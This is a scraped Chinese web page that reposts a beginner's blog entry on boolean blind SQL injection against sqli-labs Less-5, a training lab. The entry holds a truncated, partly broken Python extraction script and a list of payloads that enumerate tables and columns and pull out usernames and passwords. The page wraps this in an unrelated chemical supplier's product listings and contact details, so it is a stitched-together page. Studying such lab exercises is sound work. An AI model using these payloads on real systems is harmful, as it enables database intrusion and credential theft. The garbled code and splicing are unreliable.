sqli-labs第5关布尔盲注pyhton脚本 - osc_1dcw7r5z的个人空间...-免疫在线蚂蚁淘旗下平台-

当前位置：首页 > 新闻动态 >

热卖商品

syntasklabs/2-Bromoisonicotinic acid CAS NO.66572-56-3/66572-56-3

syntasklabs/Indole-2-carboxylic acid CAS NO.1477-50-5/1477-50-5

syntasklabs/Ethyl 2-amino-5-bromothiazole-4-carboxylate CAS NO.61830-21-5/61830-21-5

syntasklabs/2,6-Dichloropyridin-3-amine CAS NO.62476-56-6/62476-56-6

新闻详情

sqli-labs第5关布尔盲注pyhton脚本 - osc_1dcw7r5z的个人空间...

来自 : 开源中国发布时间：2021-03-24

str_num = \'%d\' %num len_url = url + \"\' and (select length(database()) = \" + str_num +\")--+\" response = requests.get(len_url) if str in response.text: print(\"数据库长度为：%s\" %str_num) content(url,str,num) break else: num = num + 1#此函数判断字符串具体的内容def content(url,str,num): s = [\'1\',\'2\',\'3\',\'4\',\'5\',\'6\',\'7\',\'8\',\'9\',\'0\',\'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\'] con_num = 1 while con_num = num: str_num = \'%d\' %con_num for i in s: con_url = url + \"\' and (select mid(database(),\"+ str_num +\",1)=\'\"+ i +\"\')--+\" response = requests.get(con_url) if str in response.text: fwrite(i) con_num = con_num + 1#此函数对字符串的内容做记录并输出def fwrite(i): fp = open(\"cache.txt\",\'a\') fp.write(i) fp.close()if __name__ == \'__main__\': url = \"http://localhost/sqli-labs/Less-5/?id=1\" response = requests.get(url) str = \"You are in...........\" if str in response.text: length(url,str) else: print(\"请输入正确的地址\")

初学python，只注重实现功能，不要太在意某些细节，如有建议，感谢提出。

#库中有几个表：

1\' and ((select count(table_name) from information_schema.tables where table_schema = \'security\') = 4)--+

#测表名长度：

1\' and (select length((select table_name from information_schema.tables where table_schema = \'security\' limit 0,1)) = 10)--+

#爆表名：

1\' and (select mid((select table_name from information_schema.tables where table_schema = \'security\' limit 0,1),1,1)=\'a\')--+

#表中有几列：

1\' and ((select count(column_name) from information_schema.columns where table_name = \'users\' and table_schema = \'security\') = 3)--+

#测列名长度：

1\' and (select length((select column_name from information_schema.columns where table_name = \'users\' and table_schema = \'security\' limit 1,1)) = 8)--+

#爆列名:

1\' and (select mid((select column_name from information_schema.columns where table_name = \'users\' and table_schema = \'security\' limit 1,1),1,1)=\'u\')--+

#爆用户名：

1\' and (select mid((select username from security.users limit 0,1),1,1)=\'d\')--+

#爆密码：

1\' and (select mid((select password from security.users limit 0,1),1,1)=\'d\')--+

以上标红的就是需要递归测试的地方(标红的地方不显示-.-!，将就看)，需要者可自行修改代码。还有上述代码中 s 列表请针对具体的情况修改，因为没有特殊字符以及大写字母等。

本文链接： http://syntasklabs.immuno-online.com/view-675687.html

发布于： 2021-03-24 阅读（0）

没有了

SQL LABS学习笔记——环境搭建_白帽子技术/思路_i春秋社区-分享你... 2021-03-24

gTalk Syntax Highlighting_V 0.3.4_chrome扩展插件下载_chrome... 2021-03-24

sqli-labs第5关布尔盲注pyhton脚本 - osc_1dcw7r5z的个人空间... 2021-03-24

Google Labs能力倾向测试题 - weixin_33774883的博客 - CSDN博客 2021-03-24

万字硬核干货!6大技巧,极速提升kubectl的生产力!_操作 2021-03-24

回顾2016年最受关注的深度学习发展历程 - SegmentFault 思否 2021-03-24

Baolab 2021-03-24

Wayfair Labs 面经|一亩三分地美国面经版 2021-03-24

CS Lab 计算机系统实验指导 2021-03-24

蚂蚁淘大讲堂：克隆的历史与发展 2017-05-04

Swift 开源项目精选导图(更新中) - 小专栏 2021-03-24

公司介绍

Syntask Laboratories Inc. is a custom synthesis organization focusing on expedient synthesis of key intermediates, building blocks for R & D Departments of pharmaceutical and biotech companies. Our mission is to efficiently serve our clients with high quality standard at competitive prices.We provide the special catalog chemicals, and custom synthesis services to accelerate their research and innovation programs. The scales of our synthesis are ranging from a few milligrams to a kilogram.We particularly have strong expertise in synthesizing the various rare adenine, imidazole, indole, pyrazole, pyridine, quinoline, oxadiaz

品牌分类

食品添加剂 Others

联络我们

服务热线：4000-520-616

（限工作日9:00-18:00）

QQ ：1570468124

手机：18915418616

官网：http://www.syntasklabs.com